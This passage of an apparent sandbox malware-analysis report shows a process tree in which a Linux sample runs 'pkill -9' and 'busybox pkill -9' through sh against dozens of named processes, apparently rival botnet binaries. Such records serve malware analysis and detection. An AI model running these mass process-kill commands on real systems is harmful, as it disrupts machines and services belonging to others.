                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1157
                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                              pkill -9 AbAd
                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1158
                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                busybox pkill -9 AbAd
                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1159
                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                sh -c "pkill -9 Tokyos || busybox pkill -9 Tokyos"
                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1160
                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                    pkill -9 Tokyos
                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1161
                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                    busybox pkill -9 Tokyos
                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1162
                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                    sh -c "pkill -9 neb || busybox pkill -9 neb"
                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1163
                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                        pkill -9 neb
                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1164
                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                        busybox pkill -9 neb
                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1165
                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                        sh -c "pkill -9 Akiru || busybox pkill -9 Akiru"
                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1166
                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                            pkill -9 Akiru
                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1167
                                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                            busybox pkill -9 Akiru
                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1168
                                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                            sh -c "pkill -9 U8inTz || busybox pkill -9 U8inTz"
                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1169
                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                pkill -9 U8inTz
                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1170
                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                  busybox pkill -9 U8inTz
                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1171
                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                  sh -c "pkill -9 netstats || busybox pkill -9 netstats"
                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1172
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                      pkill -9 netstats
                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1173
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                      busybox pkill -9 netstats
                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1174
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                      sh -c "pkill -9 Alex || busybox pkill -9 Alex"
                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1175
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                          pkill -9 Alex
                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1176
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                          busybox pkill -9 Alex
                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1177
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                          sh -c "pkill -9 W9RCAKM20T || busybox pkill -9 W9RCAKM20T"
                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1178
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                              pkill -9 W9RCAKM20T
                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1179
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                              busybox pkill -9 W9RCAKM20T
                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1180
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                              sh -c "pkill -9 newnetword || busybox pkill -9 newnetword"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1181
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  pkill -9 newnetword
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1182
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  busybox pkill -9 newnetword
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1183
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  sh -c "pkill -9 Ayo215 || busybox pkill -9 Ayo215"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1184
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      pkill -9 Ayo215
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1185
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        busybox pkill -9 Ayo215
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1186
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sh -c "pkill -9 Word || busybox pkill -9 Word"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1187
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            pkill -9 Word
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1188
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            busybox pkill -9 Word
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1189
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sh -c "pkill -9 nloads || busybox pkill -9 nloads"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1190
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                pkill -9 nloads
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1191
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                busybox pkill -9 nloads
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sh -c "pkill -9 BAdAsV || busybox pkill -9 BAdAsV"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1193
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    pkill -9 BAdAsV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1194
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      busybox pkill -9 BAdAsV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1195
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      sh -c "pkill -9 Wordmane || busybox pkill -9 Wordmane"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1196
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          pkill -9 Wordmane
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1197
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          busybox pkill -9 Wordmane
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1198
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          sh -c "pkill -9 notyakuzaa || busybox pkill -9 notyakuzaa"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1199
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              pkill -9 notyakuzaa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              busybox pkill -9 notyakuzaa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1201
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sh -c "pkill -9 Belch || busybox pkill -9 Belch"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1202
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  pkill -9 Belch
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1203
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  busybox pkill -9 Belch
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1204
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  sh -c "pkill -9 Wordnets || busybox pkill -9 Wordnets"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1205
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      pkill -9 Wordnets
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1206
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      busybox pkill -9 Wordnets
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1207
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      sh -c "pkill -9 obp || busybox pkill -9 obp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          pkill -9 obp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1209
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            busybox pkill -9 obp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1210
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sh -c "pkill -9 BigN0gg0r420 || busybox pkill -9 BigN0gg0r420"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1211
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                pkill -9 BigN0gg0r420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1212
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                busybox pkill -9 BigN0gg0r420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1213
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sh -c "pkill -9 X0102I34f || busybox pkill -9 X0102I34f"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1214
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    pkill -9 X0102I34f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1215
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    busybox pkill -9 X0102I34f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1216
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sh -c "pkill -9 ofhasfhiafhoi || busybox pkill -9 ofhasfhiafhoi"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1217
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        pkill -9 ofhasfhiafhoi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1218
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        busybox pkill -9 ofhasfhiafhoi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1219
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            pkill -9 BzSxLxBxeY
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1221
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              busybox pkill -9 BzSxLxBxeY
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1222
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sh -c "pkill -9 X19I239124UIU || busybox pkill -9 X19I239124UIU"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1223
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  pkill -9 X19I239124UIU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    busybox pkill -9 X19I239124UIU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1225
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sh -c "pkill -9 oism || busybox pkill -9 oism"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1226
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        pkill -9 oism
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1227
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        busybox pkill -9 oism
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sh -c "pkill -9 Deported || busybox pkill -9 Deported"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1229
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            pkill -9 Deported
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1230
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            busybox pkill -9 Deported
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1231
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sh -c "pkill -9 XSHJEHHEIIHWO || busybox pkill -9 XSHJEHHEIIHWO"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1232
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                pkill -9 XSHJEHHEIIHWO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1233
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                busybox pkill -9 XSHJEHHEIIHWO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1234
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sh -c "pkill -9 olsVNwo12 || busybox pkill -9 olsVNwo12"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    pkill -9 olsVNwo12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1236
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      busybox pkill -9 olsVNwo12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1237
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      sh -c "pkill -9 DeportedDeported || busybox pkill -9 DeportedDeported"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1238
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          pkill -9 DeportedDeported
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1239
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            busybox pkill -9 DeportedDeported
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sh -c "pkill -9 XkTer0GbA1 || busybox pkill -9 XkTer0GbA1"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1241
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                pkill -9 XkTer0GbA1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1242
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/busybox
